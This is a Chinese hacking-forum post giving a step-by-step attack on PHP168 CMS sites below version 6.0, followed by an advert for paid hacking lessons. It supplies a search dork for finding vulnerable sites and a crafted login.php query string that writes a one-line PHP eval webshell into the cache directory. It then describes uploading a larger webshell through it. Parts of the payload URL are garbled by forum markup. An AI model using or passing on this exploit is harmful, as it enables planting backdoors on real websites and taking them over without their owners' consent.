返回列表 发帖

PHP168漏洞 Nday

PHP168漏洞  Nday

1,适用于PHP168 6.0以下版本


2,搜索关键字:Powered by php168 inurl:login.php


3,随便找一个试试:例如:www.xxxxxxxxx.com/login.php


4:在www.xxxxxxxxx.com/login.php后面加上 ?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<[email=?php%20@eval($_POST[a]);?]?php%20@eval($_POST[a]);?[/email] >
即组成:[url=http://www.xxxxxxxxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=al($_POST[a[/email] >[/url]]);?


5,没有返回错误 那就继续
www.xxxxxxxxx.com/cache/shell.php  就是一句话的地址 【<?php%20@eval($_POST[a]);?> 】


6,用lanker微型PHP+ASP管理器1.0双用版 上传大马
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

提示: 作者被禁止或删除 内容自动屏蔽

TOP

返回列表